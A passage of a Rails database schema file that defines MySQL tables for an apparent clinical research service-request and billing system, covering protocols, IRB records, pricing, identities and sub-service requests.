t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "approvals", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "identity_id"
t.datetime "approval_date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "approval_type", default: "Resource Approval"
t.bigint "sub_service_request_id"
t.index ["identity_id"], name: "index_approvals_on_identity_id"
t.index ["service_request_id"], name: "index_approvals_on_service_request_id"
t.index ["sub_service_request_id"], name: "index_approvals_on_sub_service_request_id"
end
create_table "arms", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "name"
t.integer "visit_count", default: 1
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "subject_count", default: 1
t.bigint "protocol_id"
t.boolean "new_with_draft", default: false
t.integer "minimum_visit_count", default: 0
t.integer "minimum_subject_count", default: 0
t.index ["protocol_id"], name: "index_arms_on_protocol_id"
end
create_table "associated_surveys", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "associable_id"
t.string "associable_type"
t.bigint "survey_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["associable_id"], name: "index_associated_surveys_on_associable_id"
t.index ["survey_id"], name: "index_associated_surveys_on_survey_id"
end
create_table "audits", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "auditable_id"
t.string "auditable_type"
t.bigint "associated_id"
t.string "associated_type"
t.bigint "user_id"
t.string "user_type"
t.string "username"
t.string "action"
t.text "audited_changes"
t.integer "version", default: 0
t.string "comment"
t.string "remote_address"
t.datetime "created_at"
t.string "request_uuid"
t.index ["associated_id", "associated_type"], name: "associated_index"
t.index ["auditable_id", "auditable_type"], name: "auditable_index"
t.index ["created_at"], name: "index_audits_on_created_at"
t.index ["request_uuid"], name: "index_audits_on_request_uuid"
t.index ["user_id", "user_type"], name: "user_index"
end
create_table "available_statuses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.string "status"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.boolean "selected", default: false
t.index ["organization_id"], name: "index_available_statuses_on_organization_id"
end
create_table "catalog_managers", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.bigint "organization_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "edit_historic_data"
t.index ["identity_id"], name: "index_catalog_managers_on_identity_id"
t.index ["organization_id"], name: "index_catalog_managers_on_organization_id"
end
create_table "charges", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "service_id"
t.decimal "charge_amount", precision: 12, scale: 4
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["service_id"], name: "index_charges_on_service_id"
t.index ["service_request_id"], name: "index_charges_on_service_request_id"
end
create_table "clinical_providers", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.bigint "organization_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["identity_id"], name: "index_clinical_providers_on_identity_id"
t.index ["organization_id"], name: "index_clinical_providers_on_organization_id"
end
create_table "cover_letters", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.text "content"
t.bigint "sub_service_request_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["sub_service_request_id"], name: "index_cover_letters_on_sub_service_request_id"
end
create_table "delayed_jobs", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "priority", default: 0, null: false
t.integer "attempts", default: 0, null: false
t.text "handler", limit: 4294967295, null: false
t.text "last_error", limit: 4294967295
t.datetime "run_at"
t.datetime "locked_at"
t.datetime "failed_at"
t.string "locked_by"
t.string "queue"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["priority", "run_at"], name: "delayed_jobs_priority"
end
create_table "documents", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.datetime "deleted_at"
t.string "doc_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "document_file_name"
t.string "document_content_type"
t.integer "document_file_size"
t.datetime "document_updated_at"
t.string "doc_type_other"
t.bigint "protocol_id"
t.index ["protocol_id"], name: "index_documents_on_protocol_id"
end
create_table "documents_sub_service_requests", id: false, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "document_id"
t.bigint "sub_service_request_id"
end
create_table "editable_statuses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.string "status", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.boolean "selected", default: false
t.index ["organization_id"], name: "index_editable_statuses_on_organization_id"
end
create_table "epic_queue_records", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "status"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "origin"
t.bigint "identity_id"
end
create_table "epic_queues", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "identity_id"
t.boolean "attempted_push", default: false
t.boolean "user_change", default: false
end
create_table "epic_rights", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "project_role_id"
t.string "right"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "excluded_funding_sources", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "subsidy_map_id"
t.string "funding_source"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["subsidy_map_id"], name: "index_excluded_funding_sources_on_subsidy_map_id"
end
create_table "feedbacks", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.text "message"
t.string "name"
t.string "email"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "fulfillment_synchronizations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.integer "line_item_id"
t.string "action"
t.boolean "synched", default: false
t.index ["sub_service_request_id"], name: "index_fulfillment_synchronizations_on_sub_service_request_id"
end
create_table "fulfillments", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "line_item_id"
t.string "timeframe"
t.string "time"
t.datetime "date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "unit_type"
t.string "quantity_type"
t.integer "quantity"
t.integer "unit_quantity"
t.index ["line_item_id"], name: "index_fulfillments_on_line_item_id"
end
create_table "human_subjects_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "nct_number"
t.index ["protocol_id"], name: "index_human_subjects_info_on_protocol_id"
end
create_table "identities", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "ldap_uid"
t.string "email"
t.string "last_name"
t.string "first_name"
t.string "era_commons_name"
t.string "credentials"
t.string "subspecialty"
t.string "phone"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "catalog_overlord"
t.string "credentials_other"
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at"
t.datetime "remember_created_at"
t.integer "sign_in_count", default: 0
t.datetime "current_sign_in_at"
t.datetime "last_sign_in_at"
t.string "current_sign_in_ip"
t.string "last_sign_in_ip"
t.text "reason"
t.string "company"
t.boolean "approved"
t.string "time_zone", default: "Eastern Time (US & Canada)"
t.bigint "professional_organization_id"
t.string "orcid", limit: 19
t.index ["approved"], name: "index_identities_on_approved"
t.index ["email"], name: "index_identities_on_email"
t.index ["last_name"], name: "index_identities_on_last_name"
t.index ["ldap_uid"], name: "index_identities_on_ldap_uid", unique: true
t.index ["reset_password_token"], name: "index_identities_on_reset_password_token", unique: true
end
create_table "impact_areas", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "other_text"
t.index ["protocol_id"], name: "index_impact_areas_on_protocol_id"
end
create_table "investigational_products_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "ind_number"
t.boolean "ind_on_hold"
t.string "inv_device_number"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "exemption_type", default: ""
t.index ["protocol_id"], name: "index_investigational_products_info_on_protocol_id"
end
create_table "ip_patents_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "patent_number"
t.text "inventors"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_ip_patents_info_on_protocol_id"
end
create_table "irb_records", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8", force: :cascade do |t|
t.bigint "human_subjects_info_id"
t.string "pro_number"
t.string "irb_of_record"
t.string "submission_type"
t.date "initial_irb_approval_date"
t.date "irb_approval_date"
t.date "irb_expiration_date"
t.boolean "approval_pending"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["human_subjects_info_id"], name: "index_irb_records_on_human_subjects_info_id"
end
create_table "irb_records_study_phases", id: false, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8", force: :cascade do |t|
t.bigint "irb_record_id"
t.bigint "study_phase_id"
t.index ["irb_record_id"], name: "index_irb_records_study_phases_on_irb_record_id"
t.index ["study_phase_id"], name: "index_irb_records_study_phases_on_study_phase_id"
end
create_table "line_items", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "sub_service_request_id"
t.bigint "service_id"
t.boolean "optional", default: true
t.integer "quantity"
t.datetime "complete_date"
t.datetime "in_process_date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.integer "units_per_quantity", default: 1
t.index ["service_id"], name: "index_line_items_on_service_id"
t.index ["service_request_id"], name: "index_line_items_on_service_request_id"
t.index ["sub_service_request_id"], name: "index_line_items_on_sub_service_request_id"
end
create_table "line_items_visits", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "arm_id"
t.bigint "line_item_id"
t.integer "subject_count"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["arm_id"], name: "index_line_items_visits_on_arm_id"
t.index ["line_item_id"], name: "index_line_items_visits_on_line_item_id"
end
create_table "messages", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "notification_id"
t.bigint "to"
t.bigint "from"
t.string "email"
t.text "body"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["from"], name: "index_messages_on_from"
t.index ["notification_id"], name: "index_messages_on_notification_id"
t.index ["to"], name: "index_messages_on_to"
end
create_table "notes", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.text "body"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "notable_id"
t.string "notable_type"
t.index ["identity_id"], name: "index_notes_on_identity_id"
t.index ["identity_id"], name: "index_notes_on_user_id"
t.index ["notable_id", "notable_type"], name: "index_notes_on_notable_id_and_notable_type"
end
create_table "notifications", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.bigint "originator_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "subject"
t.bigint "other_user_id"
t.boolean "read_by_originator"
t.boolean "read_by_other_user"
t.boolean "shared"
t.index ["originator_id"], name: "index_notifications_on_originator_id"
t.index ["sub_service_request_id"], name: "index_notifications_on_sub_service_request_id"
end
create_table "options", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "question_id"
t.text "content", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["question_id"], name: "index_options_on_question_id"
end
create_table "organizations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "type"
t.string "name"
t.integer "order"
t.string "css_class", default: ""
t.text "description"
t.bigint "parent_id"
t.string "abbreviation"
t.text "ack_language"
t.boolean "process_ssrs", default: false
t.boolean "is_available", default: true
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "use_default_statuses", default: true
t.boolean "survey_completion_alerts", default: false
t.index ["is_available"], name: "index_organizations_on_is_available"
t.index ["parent_id"], name: "index_organizations_on_parent_id"
end
create_table "past_statuses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.string "status"
t.datetime "date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.bigint "changed_by_id"
t.string "new_status"
t.index ["changed_by_id"], name: "index_past_statuses_on_changed_by_id"
t.index ["sub_service_request_id"], name: "index_past_statuses_on_sub_service_request_id"
end
create_table "past_subsidies", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.integer "total_at_approval"
t.bigint "approved_by"
t.datetime "approved_at"
t.datetime "created_at"
t.datetime "updated_at"
t.float "percent_subsidy", default: 0.0
t.index ["approved_by"], name: "index_past_subsidies_on_approved_by"
t.index ["sub_service_request_id"], name: "index_past_subsidies_on_sub_service_request_id"
end
create_table "patient_registrars", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "identity_id"
t.integer "organization_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["identity_id"], name: "index_patient_registrars_on_identity_id"
t.index ["organization_id"], name: "index_patient_registrars_on_organization_id"
end
create_table "payment_uploads", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "payment_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "file_file_name"
t.string "file_content_type"
t.integer "file_file_size"
t.datetime "file_updated_at"
t.index ["payment_id"], name: "index_payment_uploads_on_payment_id"
end
create_table "payments", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.date "date_submitted"
t.decimal "amount_invoiced", precision: 12, scale: 4
t.decimal "amount_received", precision: 12, scale: 4
t.date "date_received"
t.string "payment_method"
t.text "details"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.float "percent_subsidy"
t.index ["sub_service_request_id"], name: "index_payments_on_sub_service_request_id"
end
create_table "permissible_values", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "key"
t.string "value"
t.string "concept_code"
t.bigint "parent_id"
t.integer "sort_order"
t.string "category"
t.boolean "default"
t.boolean "reserved"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.boolean "is_available"
end
create_table "pricing_maps", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_id"
t.string "unit_type"
t.decimal "unit_factor", precision: 5, scale: 2
t.decimal "percent_of_fee", precision: 5, scale: 2
t.decimal "full_rate", precision: 12, scale: 4
t.boolean "exclude_from_indirect_cost"
t.integer "unit_minimum"
t.decimal "federal_rate", precision: 12, scale: 4
t.decimal "corporate_rate", precision: 12, scale: 4
t.date "effective_date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.date "display_date"
t.decimal "other_rate", precision: 12, scale: 4
t.decimal "member_rate", precision: 12, scale: 4
t.integer "units_per_qty_max", default: 10000
t.string "quantity_type"
t.string "otf_unit_type", default: "N/A"
t.integer "quantity_minimum", default: 1
t.index ["service_id"], name: "index_pricing_maps_on_service_id"
end
create_table "pricing_setups", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.date "display_date"
t.date "effective_date"
t.boolean "charge_master"
t.decimal "federal", precision: 5, scale: 2
t.decimal "corporate", precision: 5, scale: 2
t.decimal "other", precision: 5, scale: 2
t.decimal "member", precision: 5, scale: 2
t.string "college_rate_type"
t.string "federal_rate_type"
t.string "industry_rate_type"
t.string "investigator_rate_type"
t.string "internal_rate_type"
t.string "foundation_rate_type"
t.datetime "deleted_at"
t.string "unfunded_rate_type"
t.index ["organization_id"], name: "index_pricing_setups_on_organization_id"
end
create_table "professional_organizations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.text "name"
t.string "org_type"
t.bigint "parent_id"
end
create_table "project_roles", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.bigint "identity_id"
t.string "project_rights"
t.string "role"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "role_other"
t.boolean "epic_access", default: false
t.index ["identity_id"], name: "index_project_roles_on_identity_id"
t.index ["protocol_id"], name: "index_project_roles_on_protocol_id"
end
create_table "protocol_filters", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.string "search_name"
t.boolean "show_archived"
t.string "search_query"
t.string "with_organization"
t.string "with_status"
t.datetime "created_at"
t.datetime "updated_at"
t.string "admin_filter"
t.string "with_owner"
end
create_table "protocol_merges", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "master_protocol_id"
t.integer "merged_protocol_id"
t.integer "identity_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "protocols", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "type"
t.integer "next_ssr_id"
t.string "short_title"
t.text "title"
t.string "sponsor_name"
t.text "brief_description"
t.decimal "indirect_cost_rate", precision: 6, scale: 2
t.string "study_phase"
t.string "udak_project_number"
t.string "funding_rfa"
t.string "funding_status"
t.string "potential_funding_source"
t.datetime "potential_funding_start_date"
t.string "funding_source"
t.datetime "funding_start_date"
t.string "federal_grant_serial_number"
t.string "federal_grant_title"
t.string "federal_grant_code_id"
t.string "federal_non_phs_sponsor"
t.string "federal_phs_sponsor"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "potential_funding_source_other"
t.string "funding_source_other"
t.datetime "last_epic_push_time"
t.string "last_epic_push_status"
t.datetime "start_date"
t.datetime "end_date"
t.datetime "initial_budget_sponsor_received_date"
t.datetime "budget_agreed_upon_date"
t.bigint "initial_amount"
t.bigint "initial_amount_clinical_services"
t.bigint "negotiated_amount"
t.bigint "negotiated_amount_clinical_services"
t.string "billing_business_manager_static_email"
t.datetime "recruitment_start_date"
t.datetime "recruitment_end_date"
t.boolean "selected_for_epic"
t.boolean "archived", default: false
t.bigint "study_type_question_group_id"
t.integer "research_master_id"
t.integer "sub_service_requests_count", default: 0
t.boolean "rmid_validated", default: false
t.boolean "locked"
t.string "guarantor_contact"
t.string "guarantor_phone"
t.string "guarantor_email"
t.index ["next_ssr_id"], name: "index_protocols_on_next_ssr_id"
end
create_table "question_responses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "question_id"
t.bigint "response_id"
t.text "content"
t.boolean "required", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["question_id"], name: "index_question_responses_on_question_id"
t.index ["response_id"], name: "index_question_responses_on_response_id"
end
create_table "questions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "section_id"
t.boolean "is_dependent", null: false
t.text "content", null: false
t.string "question_type", null: false
t.text "description"
t.boolean "required", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "depender_id"
t.index ["depender_id"], name: "index_questions_on_depender_id"
t.index ["section_id"], name: "index_questions_on_section_id"
end
create_table "quick_questions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "to"
t.string "from"
t.text "body"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "reports", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.string "xlsx_file_name"
t.string "xlsx_content_type"
t.integer "xlsx_file_size"
t.datetime "xlsx_updated_at"
t.string "report_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "research_types_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.boolean "human_subjects"
t.boolean "vertebrate_animals"
t.boolean "investigational_products"
t.boolean "ip_patents"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_research_types_info_on_protocol_id"
end
create_table "response_filters", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.string "name"
t.string "of_type"
t.string "with_state"
t.string "with_survey"
t.string "start_date"
t.string "end_date"
t.boolean "include_incomplete"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "responses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "survey_id"
t.bigint "identity_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "respondable_id"
t.string "respondable_type"
t.index ["identity_id"], name: "index_responses_on_identity_id"
t.index ["respondable_id", "respondable_type"], name: "index_responses_on_respondable_id_and_respondable_type"
t.index ["survey_id"], name: "index_responses_on_survey_id"
end
create_table "revenue_code_ranges", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "from"
t.integer "to"
t.float "percentage"
t.bigint "applied_org_id"
t.string "vendor"
t.integer "version"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "sections", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "survey_id"
t.string "title"
t.text "description"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["survey_id"], name: "index_sections_on_survey_id"
end
create_table "service_providers", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.bigint "organization_id"
t.boolean "is_primary_contact"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.boolean "hold_emails"
t.datetime "deleted_at"
t.index ["identity_id"], name: "index_service_providers_on_identity_id"
t.index ["organization_id"], name: "index_service_providers_on_organization_id"
end
create_table "service_relations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_id"
t.bigint "related_service_id"
t.boolean "required"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["related_service_id"], name: "index_service_relations_on_related_service_id"
t.index ["service_id"], name: "index_service_relations_on_service_id"
end
create_table "service_requests", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "status"
t.boolean "approved"
t.datetime "submitted_at"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.date "original_submitted_date"
t.index ["protocol_id"], name: "index_service_requests_on_protocol_id"
t.index ["status"], name: "index_service_requests_on_status"
end
create_table "services", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "name"
t.string "abbreviation"
t.integer "order"
t.text "description"
t.boolean "is_available", default: true
t.decimal "service_center_cost", precision: 12, scale: 4
t.string "cpt_code"
t.string "charge_code"
t.string "revenue_code"
t.bigint "organization_id"
t.string "order_code"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "send_to_epic", default: false
t.bigint "revenue_code_range_id"
t.boolean "one_time_fee", default: false
t.integer "line_items_count", default: 0
t.text "components"
t.string "eap_id"
t.index ["is_available"], name: "index_services_on_is_available"
t.index ["one_time_fee"], name: "index_services_on_one_time_fee"
t.index ["organization_id"], name: "index_services_on_organization_id"
end
create_table "sessions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "session_id", null: false
t.text "data"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["session_id"], name: "index_sessions_on_session_id"
t.index ["updated_at"], name: "index_sessions_on_updated_at"
end
create_table "settings", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "key"
t.text "value"
t.string "data_type"
t.string "friendly_name"
t.text "description"
t.string "group"
t.string "version"
t.string "parent_key"
t.string "parent_value"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["key"], name: "index_settings_on_key", unique: true
end
create_table "short_interactions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.string "name"
t.string "email"
t.string "institution"
t.integer "duration_in_minutes"
t.string "subject"
t.text "note"
t.datetime "created_at"
t.datetime "updated_at"
t.string "interaction_type"
t.index ["identity_id"], name: "index_short_interactions_on_identity_id"
end
create_table "study_phases", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "order"
t.string "phase"
t.integer "version", default: 1
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "study_type_answers", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.bigint "study_type_question_id"
t.boolean "answer"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "study_type_question_groups", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "version"
t.boolean "active", default: false
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "study_type_questions", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "order"
t.text "question"
t.string "friendly_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "study_type_question_group_id"
end
create_table "study_types", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_study_types_on_protocol_id"
end
create_table "sub_service_requests", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "organization_id"
t.bigint "owner_id"
t.string "ssr_id"
t.string "status"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.datetime "consult_arranged_date"
t.datetime "requester_contacted_date"
t.boolean "nursing_nutrition_approved", default: false
t.boolean "lab_approved", default: false
t.boolean "imaging_approved", default: false
t.boolean "committee_approved", default: false
t.boolean "in_work_fulfillment", default: false
t.string "routing"
t.text "org_tree_display"
t.bigint "service_requester_id"
t.datetime "submitted_at"
t.bigint "protocol_id"
